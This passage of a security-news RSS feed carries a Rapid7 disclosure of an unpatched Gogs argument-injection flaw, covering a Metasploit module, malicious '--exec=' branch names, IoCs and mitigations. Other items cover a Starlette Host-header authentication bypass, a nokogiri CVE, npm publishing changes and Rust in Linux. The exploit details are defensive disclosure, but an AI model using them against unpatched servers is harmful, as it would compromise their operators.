href="https://nvd.nist.gov/vuln/detail/CVE-2024-39933" target="_blank"><span>CVE-2024-39933</span></a></p></td><td><p><span>Argument injection when tagging new releases</span></p></td><td><p><span>Added </span><span><span data-type="inlineCode">--</span></span><span> separator to </span><span><span data-type="inlineCode">git tag</span></span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-m27m-h5gj-wwmg" target="_blank"><span>GHSA-m27m-h5gj-wwmg</span></a></p></td></tr><tr><td><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39932" target="_blank"><span>CVE-2024-39932</span></a></p></td><td><p><span>Argument injection during changes preview</span></p></td><td><p><span>Added </span><span><span data-type="inlineCode">--end-of-options</span></span><span> to </span><span><span data-type="inlineCode">git diff</span></span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-9pp6-wq8c-3w2c" target="_blank"><span>GHSA-9pp6-wq8c-3w2c</span></a></p></td></tr><tr><td><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-26194" target="_blank"><span>CVE-2026-26194</span></a></p></td><td><p><span>Release tag option injection in deletion</span></p></td><td><p><span>Migrated to safe git-module API</span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-v9vm-r24h-6rqm" target="_blank"><span>GHSA-v9vm-r24h-6rqm</span></a></p></td></tr><tr><td><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39930" target="_blank"><span>CVE-2024-39930</span></a></p></td><td><p><span>Argument injection in built-in SSH server</span></p></td><td><p><span>Added </span><span><span data-type="inlineCode">--</span></span><span> separator to </span><span><span data-type="inlineCode">git upload-pack</span></span><span> / </span><span><span data-type="inlineCode">git receive-pack</span></span></p></td><td><p><a href="https://github.com/gogs/gogs/security/advisories/GHSA-vm62-9jw3-c8w3" target="_blank"><span>GHSA-vm62-9jw3-c8w3</span></a></p></td></tr></tbody></table><p><span>The </span><a href="https://github.com/gogs/git-module" target="_blank"><span>git-module library</span></a><span> (</span><span><span data-type="inlineCode">v1.8.7</span></span><span>) was hardened with </span><span><span data-type="inlineCode">--end-of-options</span></span><span> across </span><span><span data-type="inlineCode">Clone()</span></span><span>, </span><span><span data-type="inlineCode">Push()</span></span><span>, </span><span><span data-type="inlineCode">Fetch()</span></span><span>, and 28 other call sites. However, the </span><span><span data-type="inlineCode">Merge()</span></span><span> function in </span><span><span data-type="inlineCode">internal/database/pull.go</span></span><span> bypasses all of these protections because it uses raw </span><span><span data-type="inlineCode">process.ExecDir</span></span><span> (wrapping </span><span><span data-type="inlineCode">exec.Command</span></span><span> directly) instead of the safe git-module API. The </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282" target="_blank"><span>git rebase call</span></a><span> was never migrated.</span></p><h2>Exploitation</h2><p><span>The </span><a href="https://github.com/rapid7/metasploit-framework/pull/21515" target="_blank"><span>Metasploit module</span></a><span> automates the full exploit chain against both Linux and Windows targets and supports two modes of operation:</span></p><ul><li><p><span><span data-type="inlineCode">own_repo</span></span><span> (default): The module creates a temporary repository under the attacker's account, runs the exploit, and deletes the repo on cleanup. This works on any default-configured instance and supports all payload types.</span></p></li><li><p><span><span data-type="inlineCode">existing_repo</span></span><span>: The module targets a repository the attacker already has write and merge access to. This is useful on instances where repo creation is restricted. Only command payloads are supported in this mode (staged payloads would require multiple merge cycles, which is not possible due to the repo corruption described above). Cleanup deletes the malicious branches and closes the PR, but the repository's git state remains corrupted.</span></p></li></ul><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt96293b4d910dac8f/6a17457e02f3b52e2dcf8ba3/image1.png" alt="image1.png" caption="Figure 1: Metasploit module obtaining a command shell session on a Gogs 0.14.2 instance running on Ubuntu." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="image1.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt96293b4d910dac8f/6a17457e02f3b52e2dcf8ba3/image1.png" data-sys-asset-uid="blt96293b4d910dac8f" data-sys-asset-filename="image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Metasploit module obtaining a command shell session on a Gogs 0.14.2 instance running on Ubuntu." data-sys-asset-alt="image1.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Metasploit module obtaining a command shell session on a Gogs 0.14.2 instance running on Ubuntu.</figcaption></div></figure><p>⠀</p><p><span>On Windows, the module uses the file-based delivery method described above to work around NTFS filename restrictions.</span></p><p>⠀</p><p><span><em>Figure 2: Metasploit module obtaining a Meterpreter session on a Gogs 0.14.2 instance running on Windows 11.</em></span></p><h2>Indicators of compromise (IoCs)</h2><p><span>Defenders should watch the Gogs server logs for error entries matching this pattern:</span></p><p><span></span></p><pre language="html">[E] ...merge: git checkout '--exec=&lt;...&gt;': exit status 128 - error: unknown option `exec=&lt;...&gt;'</pre><p>⠀</p><p><span>This is logged via </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L425" target="_blank"><span>c.Error(err, "merge")</span></a><span>, which writes the full error (including the malicious branch name) to the server log at ERROR level. Note that a more cleverly written exploit may not be this obvious in log files.</span></p><p><span>If the attack targeted an existing repository (rather than one the attacker created and deleted), additional artifacts will be present: the malicious branch name (e.g. </span><span><span data-type="inlineCode">--exec=...</span></span><span>) in the repository's branch listing, a failed pull request in the PR history, and the repository itself will be in a corrupted git state (returning HTTP 500 on certain operations). On Windows, the committed payload files (e.g. </span><span><span data-type="inlineCode">.abcdef</span></span><span>, </span><span><span data-type="inlineCode">.abcdef.bat</span></span><span>) will also remain in the git history. Administrators should audit repositories for branch names beginning with </span><span><span data-type="inlineCode">--</span></span><span>.</span></p><p><span>The Metasploit module also creates a Gogs API token (named </span><span><span data-type="inlineCode">msf_&lt;hex&gt;</span></span><span>) during exploitation. Gogs does not expose a token deletion API endpoint, so this token persists after the attack and remains valid until manually revoked via the web UI or database. Defenders should check user token lists at </span><span><span data-type="inlineCode">/-/user/settings/applications</span></span><span> for unexpected entries.</span></p><p><span>The payload file used during exploitation is written to the repository's bare git directory on the server filesystem and will persist after the attack.</span></p><h2>Remediation</h2><p><span>No patch is available at the time of publication. Rapid7 reported this vulnerability to the Gogs maintainers on March 17, 2026, and followed up multiple times through May 2026. The maintainer acknowledged receipt on March 28, 2026, but has not provided a fix or further response. Users of Gogs should evaluate the following mitigations:</span></p><ul><li><p><span>Restricting user registration (</span><span><span data-type="inlineCode">DISABLE_REGISTRATION = true</span></span><span> in </span><span><span data-type="inlineCode">app.ini</span></span><span>) to prevent untrusted users from creating accounts. This is the most impactful mitigation since the exploit is self-contained within a single user's repository.</span></p></li><li><p><span>Restricting repository creation (</span><span><span data-type="inlineCode">MAX_CREATION_LIMIT = 0</span></span><span> in </span><span><span data-type="inlineCode">app.ini</span></span><span>) to prevent users from creating their own repos. This can also be set per-user via </span><span><span data-type="inlineCode">Max Repo Creation</span></span><span> in the admin panel. This blocks the easiest attack path (creating a new repo with rebase enabled), but does not prevent exploitation by users with write access to existing repositories.</span></p></li><li><p><span>Auditing rebase merge settings: While "Rebase before merging" can be </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/internal/database/repo.go#L219" target="_blank"><span>disabled per-repo</span></a><span> under </span><span><span data-type="inlineCode">Settings &gt; Advanced</span></span><span>, note that this is not an effective defense against a malicious user who owns or has admin access to a repo, since they can re-enable rebase at will. There is no global or organization-level setting to restrict this. Disabling rebase is only useful for reducing the attack surface on shared repositories where the attacker has write access but not admin privileges.</span></p></li></ul><h2>Disclosure timeline</h2><ul><li><p><span><strong>March 16, 2026:</strong></span><span> Vulnerability discovered and validated against Gogs </span><span><span data-type="inlineCode">0.14.2</span></span><span> and </span><span><span data-type="inlineCode">0.15.0+dev</span></span><span> (commit </span><span>b53d3162</span><span>).</span></p></li><li><p><span><strong>March 17, 2026:</strong></span><span> Reported to Gogs maintainers via GitHub Security Advisory (GHSA-qf6p-p7ww-cwr9).</span></p></li><li><p><span><strong>March 28, 2026:</strong></span><span> Maintainer acknowledges receipt.</span></p></li><li><p><span><strong>April 21, 2026:</strong></span><span> Contacted maintainer for a status update (no response).</span></p></li><li><p><span><strong>May 6, 2026:</strong></span><span> Reminded maintainer of previously planned disclosure date, and offered extension if required (no response).</span></p></li><li><p><span><strong>May 20, 2026:</strong></span><span> Advised maintainer the blog release date is finalized for May 28, 2026 (no response).</span></p></li><li><p><span><strong>May 28, 2026:</strong></span><span> This disclosure.</span></p></li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-6490 | sparklemotion nokogiri c29c920907366cb74af13b4dc2230e9c9e23b833 hashmap.c hashmap_set_with_hash heap-based overflow (EUVD-2025-18911 / WID-SEC-2026-1687)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in sparklemotion nokogiri c29c920907366cb74af13b4dc2230e9c9e23b833. Affected by this issue is the function hashmap_set_with_hash of the file gumbo-parser/src/hashmap.c. Executing a manipulation can lead to heap-based buffer overflow.

This vulne...]]></description>
<link>https://tsecurity.de/de/3552706/sicherheitsluecken/cve-2025-6490-sparklemotion-nokogiri-c29c920907366cb74af13b4dc2230e9c9e23b833-hashmapc-hashmapsetwithhash-heap-based-overflow-euvd-2025-18911-wid-sec-2026-1687/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552706/sicherheitsluecken/cve-2025-6490-sparklemotion-nokogiri-c29c920907366cb74af13b4dc2230e9c9e23b833-hashmapc-hashmapsetwithhash-heap-based-overflow-euvd-2025-18911-wid-sec-2026-1687/</guid>
<pubDate>Thu, 28 May 2026 02:23:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/sparklemotion:nokogiri">sparklemotion nokogiri c29c920907366cb74af13b4dc2230e9c9e23b833</a>. Affected by this issue is the function <code>hashmap_set_with_hash</code> of the file <em>gumbo-parser/src/hashmap.c</em>. Executing a manipulation can lead to heap-based buffer overflow.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2025-6490">CVE-2025-6490</a>. The attack needs to be launched locally. Furthermore, an exploit is available.

It is still unclear if this vulnerability genuinely exists.

Applying a patch is advised to resolve this issue.

The project maintainer explains that the affected code was merged into the main branch but the commit never appeared in an official release.]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust Will Save Linux From AI, Says Greg Kroah-Hartman]]></title>
<description><![CDATA[Linux stable kernel maintainer Greg Kroah-Hartman says Rust can help Linux deal with a flood of AI-discovered security bugs (namely Dirty Frag, Copy Fail, and Fragnesia) by preventing common C mistakes around memory, locking, error handling, and untrusted data at build time rather than during hum...]]></description>
<link>https://tsecurity.de/de/3552431/it-security-nachrichten/rust-will-save-linux-from-ai-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552431/it-security-nachrichten/rust-will-save-linux-from-ai-says-greg-kroah-hartman/</guid>
<pubDate>Wed, 27 May 2026 23:08:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Linux stable kernel maintainer Greg Kroah-Hartman says Rust can help Linux deal with a flood of AI-discovered security bugs (namely Dirty Frag, Copy Fail, and Fragnesia) by preventing common C mistakes around memory, locking, error handling, and untrusted data at build time rather than during human review. It's "not a silver bullet" and does not mean rewriting the whole kernel, but he said new drivers and subsystems will increasingly use Rust as Linux evolves forward. ZDNet reports: Kroah-Hartman illustrated those pitfalls with real C bugs in the kernel, including a 15-year-old Bluetooth bug that dereferenced a pointer without checking it and a Xen bug where "we forgot to unlock" in an error path. "The majority of the bugs in the kernel are this tiny, minor stuff," he explained. "Error conditions aren't checked, locks aren't forgotten, unreleased memories leak, and vulnerabilities add up over time. They crash the kernel. This is what we live with in C. This is why we don't like it." Kroah-Hartman argued that the "best beauty of Rust" is catching those mistakes at build time rather than in review. For example, when it comes to locking, he highlighted Rust's locking abstractions in the kernel: "The only way you can get access to inner pointers of structures is by grabbing that lock, and releasing the lock automatically. The compiler does it, it's guarded, the lock happens, everything's happy. You just can't write code to access these values...without grabbing the lock. The compiler will not let you."
 
Those properties, he argued, directly remove a huge fraction of the bugs he sees: "This is going to save us those two things. First, 60% of the bugs in the kernel right there, they're gone. Thank you." The payoff is earlier, more automated enforcement: "If this happens at build time, not review time, don't make me a maintainer who has to read your code [and] say, 'Oh, then you properly check that error value. Oh, did you properly grab the locks in the right spot?' Rust gives us that for free. This is the best thing ever." Even if Rust vanished tomorrow, Kroah-Hartman argued, it has already forced the kernel to clean up C code and interfaces. He credited Rust's influence outright: "We stole this from Rust. Thank you. It's a good idea, so if Rust disappeared tomorrow, we have cleaned up the C code in the kernel so much and taken in the ideas. We thank you, you've made Linux better with it just by existing."
 
[...] What ultimately sold a number of core maintainers, including him, on Rust was how it "makes reviewing code easier." With CI [Continuous Integration] bots enforcing builds and Rust's type system enforcing key invariants, maintainers can "focus on the logic" rather than resource bookkeeping: "I can care about that one function. I don't have to worry about the rest of this stuff, because I assume that it works properly, because it was built properly." Internally, he said, the top maintainers have already made their call on Rust's status: "The Linux kernel maintainers, we get together every year and talk about what the processes are doing. Last year, we said the Rust experiment is over. It's not an experiment. This is for real." The rationale: "The people behind it are real. We trust them. We know what they're doing. They've shown and put in the work to make Rust a viable language in the kernel, and we're going to make this stick. Let's go full speed ahead. And, as always," he said wryly, "world domination proceeds." 

"If you never remember anything else in my talk, just remember these four words. It came from Microsoft Security many, many years ago," Kroah-Hartman told attendees. "They realized all input is evil. You have to validate all input."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Rust+Will+Save+Linux+From+AI%2C+Says+Greg+Kroah-Hartman%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F05%2F27%2F208203%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F05%2F27%2F208203%2Frust-will-save-linux-from-ai-says-greg-kroah-hartman%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/05/27/208203/rust-will-save-linux-from-ai-says-greg-kroah-hartman?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Interview session with Jonathan Corbet]]></title>
<description><![CDATA[The Linux Foundation will be hosting a
live interview with LWN co-founder Jonathan Corbet.  The event will
take place on Tuesday, June 2 at 8:00AM Pacific daylight time (UTC-7).
Registration is open for those who would like to attend.]]></description>
<link>https://tsecurity.de/de/3552300/linux-tipps/interview-session-with-jonathan-corbet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552300/linux-tipps/interview-session-with-jonathan-corbet/</guid>
<pubDate>Wed, 27 May 2026 21:39:20 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Linux Foundation will be hosting <a href="https://www.linuxfoundation.org/webinars/my-life-as-a-linux-kernel-developer-and-maintainer-with-jonathan-corbet?hsLang=en">a
live interview</a> with LWN co-founder Jonathan Corbet.  The event will
take place on Tuesday, June 2 at 8:00AM Pacific daylight time (UTC-7).
Registration is open for those who would like to attend.]]></content:encoded>
</item>
<item>
<title><![CDATA[npm führt staged publishing ein: 2FA-Freigabe stoppt riskante Supply-Chain-Publishes]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – npm bekommt mit staged publishing ein neues Kontrollmodell: Maintainer laden Pakete zunächst in eine Stage-Queue hoch und müssen dann per 2FA manuell freigeben, bevor Versionen installierbar werden. Damit schafft GitHub nach dem Prinzip „proof of presence“ eine zusätzliche ...]]></description>
<link>https://tsecurity.de/de/3551770/it-security-nachrichten/npm-fuehrt-staged-publishing-ein-2fa-freigabe-stoppt-riskante-supply-chain-publishes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551770/it-security-nachrichten/npm-fuehrt-staged-publishing-ein-2fa-freigabe-stoppt-riskante-supply-chain-publishes/</guid>
<pubDate>Wed, 27 May 2026 18:08:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/npm-staged-publishing-2fa-gate-supply-chain.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/npm-staged-publishing-2fa-gate-supply-chain.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/npm-staged-publishing-2fa-gate-supply-chain-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/npm-staged-publishing-2fa-gate-supply-chain-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/npm-staged-publishing-2fa-gate-supply-chain-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/npm-staged-publishing-2fa-gate-supply-chain-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/npm-staged-publishing-2fa-gate-supply-chain-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – npm bekommt mit staged publishing ein neues Kontrollmodell: Maintainer laden Pakete zunächst in eine Stage-Queue hoch und müssen dann per 2FA manuell freigeben, bevor Versionen installierbar werden. Damit schafft GitHub nach dem Prinzip „proof of presence“ eine zusätzliche Hürde gegen automatisierte Manipulationen aus kompromittierten Accounts oder fehlerhaften CI/CD-Pipelines. Die Umstellung ist […]</p>
<div><a href="https://www.it-boltwise.de/npm-fuehrt-staged-publishing-ein-2fa-freigabe-stoppt-riskante-supply-chain-publishes.html">... den vollständigen Artikel <strong>»npm führt staged publishing ein: 2FA-Freigabe stoppt riskante Supply-Chain-Publishes«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/npm-fuehrt-staged-publishing-ein-2fa-freigabe-stoppt-riskante-supply-chain-publishes.html">npm führt staged publishing ein: 2FA-Freigabe stoppt riskante Supply-Chain-Publishes</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastAPI-based AI tools exposed to authentication bypass by flaw in Starlette framework]]></title>
<description><![CDATA[A single malformed character in a web request can let an unauthenticated attacker slip past the access controls that guard applications built on Starlette, the open-source Python framework that powers FastAPI, researchers said.



The flaw, tracked as CVE-2026-48710 could allow attackers to bypas...]]></description>
<link>https://tsecurity.de/de/3551577/ai-nachrichten/fastapi-based-ai-tools-exposed-to-authentication-bypass-by-flaw-in-starlette-framework/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551577/ai-nachrichten/fastapi-based-ai-tools-exposed-to-authentication-bypass-by-flaw-in-starlette-framework/</guid>
<pubDate>Wed, 27 May 2026 17:03:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A single malformed character in a web request can let an unauthenticated attacker slip past the access controls that guard applications built on Starlette, the open-source Python framework that powers FastAPI, researchers said.</p>



<p>The flaw, tracked as CVE-2026-48710 could allow attackers to bypass host-validation protections using malformed Host headers, according to an <a href="https://www.x41-dsec.de/lab/advisories/x41-2026-002-starlette" target="_blank" rel="noreferrer noopener">advisory from cybersecurity firm X41 D-Sec</a>.</p>



<p>The attacker needs no password and no action from a victim, it said.</p>



<p>Starlette’s maintainer released a patch through an <a href="https://github.com/Kludex/starlette/security/advisories/GHSA-86qp-5c8j-p5mr" target="_blank" rel="noreferrer noopener">official GitHub security advisory</a> after X41 D-Sec disclosed the vulnerability in coordination with the Open Source Technology Improvement Fund (OSTIF). They found the flaw during an unrelated source-code audit, and traced it to Starlette rather than the application under review.</p>



<p>“This bug is a classic ‘responsibility gap’ where if this maintainer didn’t patch, thousands of exposed projects would have to individually secure their projects,” OSTIF said.</p>



<p>The researchers have created a website, <a href="https://badhost.org/" target="_blank" rel="noreferrer noopener">badhost.org</a>, that can test websites for the vulnerability.</p>



<h2 class="wp-block-heading">Exploiting the bug</h2>



<p>The flaw lies in how Starlette rebuilds the address of an incoming request, according to X41 D-Sec. The framework joins the Host header sent by the client to the path that was requested to form a complete URL, but parses the whole and the parts for validity using different rules.</p>



<p>A Host header containing a slash, question mark or hash character shifts where the path begins, the researchers said, so the path Starlette reports no longer matches the one the server actually received.</p>



<p>That gap is where the risk lies, according to the firm. Starlette routes the request to the real path, but middleware and endpoints read the altered one. An application that restricts sensitive routes by checking the path it sees can let a request through while still running the protected route behind it.</p>



<p>X41 D-Sec published a demonstration with its advisory. The researchers sent a request to a protected administrative page and received a “403 Forbidden” response. They sent the same request with one extra character in the Host header, and the page returned a “200 OK.” The same pattern has surfaced in other recent <a href="https://www.csoonline.com/article/4171215/praisonai-vulnerability-gets-scanned-within-4-hours-of-disclosure.html">authentication-bypass flaws</a> in open-source AI frameworks.</p>



<h2 class="wp-block-heading">Severity rating under dispute</h2>



<p>Starlette’s maintainer rated the flaw at 6.5 out of 10, or Moderate, on the CVSS scale in the GitHub advisory. X41 D-Sec rated it 7.0, or High, and said the danger to software built on Starlette runs higher than either figure suggests.</p>



<p>The damage an attacker can do depends on what each application does with the forged path. X41 D-Sec said it found several open-source projects whose security checks rely on the reconstructed address. In those projects, the single-character flaw could chain into “authentication bypass to SSRF and other issues that in some cases even lead to remote-code-execution on the affected system,” the researchers wrote.</p>



<p>The reach extends well past Starlette itself. A separate <a href="https://www.secwest.net/starlette" target="_blank" rel="noreferrer noopener">advisory from security firm Secwest</a> on the flaw said the score “materially understates the downstream impact” and warned that the bug touches “most of the model-serving, gateway, proxy, eval, agent, and MCP-server infrastructure that has been stood up in the last two years.”</p>



<p>Affected software includes model-serving tools, <a href="https://www.csoonline.com/article/4112265/critical-vulnerability-in-ibm-api-connect-could-allow-authentication-bypass-2.html">API gateways</a>, OpenAI-compatible proxies, agent frameworks and Model Context Protocol servers built on FastAPI, according to X41 D-Sec and Secwest.</p>



<p>An application can be exposed even if its developers never installed Starlette, because another component may have, X41 D-Sec said. Starlette has more than 400,000 dependent projects on GitHub, according to the firm.</p>



<h2 class="wp-block-heading">Who is most exposed</h2>



<p>Not every dependent project is equally at risk, X41 D-Sec said. Whether an application can be attacked comes down to how it is. The dividing line is the reverse proxy: A proxy such as nginx or Apache HTTP Server rejects the malformed request before it reaches the application, and production websites usually sit behind such a layer. Research, evaluation and development setups for AI software often do not, and many run the application server facing the network directly, it said.</p>



<p>Three groups face the most exposure, according to X41 D-Sec: those running a FastAPI or Starlette application directly on an application server with no compliant reverse proxy in front; those exposing a model proxy such as LiteLLM or vLLM as a directly reachable endpoint; and those whose access-control code reads the reconstructed request address rather than the raw path.</p>



<p>The researchers advised teams to upgrade to Starlette 1.0.1 or later, which validates the Host header and rejects malformed values.</p>



<p><em>This article first appeared on <a href="https://www.csoonline.com/article/4177711/fastapi-based-ai-tools-exposed-to-authentication-bypass-by-flaw-in-starlette-framework.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastAPI-based AI tools exposed to authentication bypass by flaw in Starlette framework]]></title>
<description><![CDATA[A single malformed character in a web request can let an unauthenticated attacker slip past the access controls that guard applications built on Starlette, the open-source Python framework that powers FastAPI, researchers said.



The flaw, tracked as CVE-2026-48710 could allow attackers to bypas...]]></description>
<link>https://tsecurity.de/de/3551522/it-security-nachrichten/fastapi-based-ai-tools-exposed-to-authentication-bypass-by-flaw-in-starlette-framework/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551522/it-security-nachrichten/fastapi-based-ai-tools-exposed-to-authentication-bypass-by-flaw-in-starlette-framework/</guid>
<pubDate>Wed, 27 May 2026 16:54:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A single malformed character in a web request can let an unauthenticated attacker slip past the access controls that guard applications built on Starlette, the open-source Python framework that powers FastAPI, researchers said.</p>



<p>The flaw, tracked as CVE-2026-48710 could allow attackers to bypass host-validation protections using malformed Host headers, according to an <a href="https://www.x41-dsec.de/lab/advisories/x41-2026-002-starlette" target="_blank" rel="noreferrer noopener">advisory from cybersecurity firm X41 D-Sec</a>.</p>



<p>The attacker needs no password and no action from a victim, it said.</p>



<p>Starlette’s maintainer released a patch through an <a href="https://github.com/Kludex/starlette/security/advisories/GHSA-86qp-5c8j-p5mr" target="_blank" rel="noreferrer noopener">official GitHub security advisory</a> after X41 D-Sec disclosed the vulnerability in coordination with the Open Source Technology Improvement Fund (OSTIF). They found the flaw during an unrelated source-code audit, and traced it to Starlette rather than the application under review.</p>



<p>“This bug is a classic ‘responsibility gap’ where if this maintainer didn’t patch, thousands of exposed projects would have to individually secure their projects,” OSTIF said.</p>



<p>The researchers have created a website, <a href="https://badhost.org/" target="_blank" rel="noreferrer noopener">badhost.org</a>, that can test websites for the vulnerability.</p>



<h2 class="wp-block-heading">Exploiting the bug</h2>



<p>The flaw lies in how Starlette rebuilds the address of an incoming request, according to X41 D-Sec. The framework joins the Host header sent by the client to the path that was requested to form a complete URL, but parses the whole and the parts for validity using different rules.</p>



<p>A Host header containing a slash, question mark or hash character shifts where the path begins, the researchers said, so the path Starlette reports no longer matches the one the server actually received.</p>



<p>That gap is where the risk lies, according to the firm. Starlette routes the request to the real path, but middleware and endpoints read the altered one. An application that restricts sensitive routes by checking the path it sees can let a request through while still running the protected route behind it.</p>



<p>X41 D-Sec published a demonstration with its advisory. The researchers sent a request to a protected administrative page and received a “403 Forbidden” response. They sent the same request with one extra character in the Host header, and the page returned a “200 OK.” The same pattern has surfaced in other recent <a href="https://www.csoonline.com/article/4171215/praisonai-vulnerability-gets-scanned-within-4-hours-of-disclosure.html">authentication-bypass flaws</a> in open-source AI frameworks.</p>



<h2 class="wp-block-heading">Severity rating under dispute</h2>



<p>Starlette’s maintainer rated the flaw at 6.5 out of 10, or Moderate, on the CVSS scale in the GitHub advisory. X41 D-Sec rated it 7.0, or High, and said the danger to software built on Starlette runs higher than either figure suggests.</p>



<p>The damage an attacker can do depends on what each application does with the forged path. X41 D-Sec said it found several open-source projects whose security checks rely on the reconstructed address. In those projects, the single-character flaw could chain into “authentication bypass to SSRF and other issues that in some cases even lead to remote-code-execution on the affected system,” the researchers wrote.</p>



<p>The reach extends well past Starlette itself. A separate <a href="https://www.secwest.net/starlette" target="_blank" rel="noreferrer noopener">advisory from security firm Secwest</a> on the flaw said the score “materially understates the downstream impact” and warned that the bug touches “most of the model-serving, gateway, proxy, eval, agent, and MCP-server infrastructure that has been stood up in the last two years.”</p>



<p>Affected software includes model-serving tools, <a href="https://www.csoonline.com/article/4112265/critical-vulnerability-in-ibm-api-connect-could-allow-authentication-bypass-2.html">API gateways</a>, OpenAI-compatible proxies, agent frameworks and Model Context Protocol servers built on FastAPI, according to X41 D-Sec and Secwest.</p>



<p>An application can be exposed even if its developers never installed Starlette, because another component may have, X41 D-Sec said. Starlette has more than 400,000 dependent projects on GitHub, according to the firm.</p>



<h2 class="wp-block-heading">Who is most exposed</h2>



<p>Not every dependent project is equally at risk, X41 D-Sec said. Whether an application can be attacked comes down to how it is. The dividing line is the reverse proxy: A proxy such as nginx or Apache HTTP Server rejects the malformed request before it reaches the application, and production websites usually sit behind such a layer. Research, evaluation and development setups for AI software often do not, and many run the application server facing the network directly, it said.</p>



<p>Three groups face the most exposure, according to X41 D-Sec: those running a FastAPI or Starlette application directly on an application server with no compliant reverse proxy in front; those exposing a model proxy such as LiteLLM or vLLM as a directly reachable endpoint; and those whose access-control code reads the reconstructed request address rather than the raw path.</p>



<p>The researchers advised teams to upgrade to Starlette 1.0.1 or later, which validates the Host header and rejects malformed values.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust will save Linux from AI, says Greg Kroah-Hartman]]></title>
<description><![CDATA[Now that doesn't mean Linux stable kernel maintainer Greg Kroah-Hartman thinks Rust is magic.]]></description>
<link>https://tsecurity.de/de/3551296/hacking/rust-will-save-linux-from-ai-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551296/hacking/rust-will-save-linux-from-ai-says-greg-kroah-hartman/</guid>
<pubDate>Wed, 27 May 2026 15:39:23 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Now that doesn't mean Linux stable kernel maintainer Greg Kroah-Hartman thinks Rust is magic.]]></content:encoded>
</item>
<item>
<title><![CDATA[Schadcode stiehlt CI/CD-Secrets aus GitHub und npm]]></title>
